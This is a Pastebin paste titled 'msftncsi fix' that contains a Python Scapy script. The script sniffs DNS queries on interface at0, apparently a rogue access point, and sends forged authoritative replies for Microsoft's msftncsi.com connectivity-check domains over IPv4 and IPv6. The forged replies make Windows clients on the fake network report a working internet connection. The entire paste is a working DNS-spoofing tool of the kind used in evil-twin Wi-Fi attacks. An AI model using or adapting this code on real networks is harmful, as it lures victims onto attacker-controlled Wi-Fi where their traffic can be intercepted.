API tools faq
paste
Advertisement
martinpo21

msftncsi fix

martinpo21
Jan 17th, 2016
176
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.22 KB | None | 0 0
raw download clone embed print report
  1. from scapy.all import *
  2. DIR=os.path.dirname(os.path.abspath(__file__))
  3. print('Executed from '+DIR+'\n')
  4. print('Assuming interface at0')
  5.  
  6. def FakeAccess2(pkt):
  7. pkt=pkt[0]
  8. if pkt.haslayer(DNSQR):
  9. print('Packet with DNSQR layer found.')
  10. if pkt[DNS].qd.qtype == 1:
  11. print('DNSQR type appears type = A')
  12. if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
  13. #MUST RETURN TRUE VALUE!
  14. print('It appears captured DNS request requests dns.msftncsi.com')
  15. spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
  16. IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
  17. UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
  18. DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
  19. an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=64, rdata='131.107.255.255'))
  20. del pkt[IP].chksum
  21. del pkt[UDP].chksum
  22.  
  23. sendp(spoofed_pkt,iface='at0')
  24. print('Spoofed response send:')
  25. spoofed_pkt.show2()
  26.  
  27. if 'www' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
  28. #MUST POINT TO SERVER WITH ncsi.txt; ISTO NARED ZA IPV6
  29. print('It appears captured DNS request requests www.msftncsi.com')
  30. spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
  31. IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
  32. UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
  33. DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
  34. # 10.0.0.254 mora bit GW nastiman za dhcp
  35. an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=64, rdata='10.0.0.254'))
  36. del pkt[IP].chksum
  37. del pkt[UDP].chksum
  38.  
  39. sendp(spoofed_pkt,iface='at0')
  40. print('Spoofed response send:')
  41. spoofed_pkt.show2()
  42.  
  43. else:
  44. print('Wrong DNS.qd.qname :'+pkt[DNS].qd.qname)
  45.  
  46. if pkt[DNS].qd.qtype == 28:
  47. print('DNSQR type appears type = AAAA')
  48. if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
  49. #MUST RETURN TRUE VALUE
  50. print('AAAA DNS request for dns.msftncsi.com found, loop works')
  51. spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
  52. IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
  53. UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
  54. DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
  55. an=DNSRR(rrname=pkt[DNS].qd.qname, type=28, ttl=64, rdata='fd3e:4f5a:5b81::1'))
  56.  
  57. del pkt[IP].chksum
  58. del pkt[UDP].chksum
  59.  
  60. sendp(spoofed_pkt,iface='at0')
  61. print('Spoofed response send:')
  62. spoofed_pkt.show2()
  63.  
  64. if 'dns' not in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
  65. #MUST RETURN TRUE VALUE
  66. print('AAAA DNS request for www.msftncsi.com found, loop works')
  67. spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
  68. IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
  69. UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
  70. DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
  71. an=DNSRR(rrname=pkt[DNS].qd.qname, type=28, ttl=64, rdata='fe80::ea94:f6ff:fe24:d147'))
  72. #RDATA JE IPV6 OD at0
  73. del pkt[IP].chksum
  74. del pkt[UDP].chksum
  75.  
  76. sendp(spoofed_pkt,iface='at0')
  77. print('Spoofed response send:')
  78. spoofed_pkt.show2()
  79.  
  80. else:
  81. print('Captured packet has no DNSQR')
  82.  
  83. print('Sniffing...')
  84. sniff(filter='dst port 53',prn=FakeAccess2, store=0, count=0, iface='at0')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!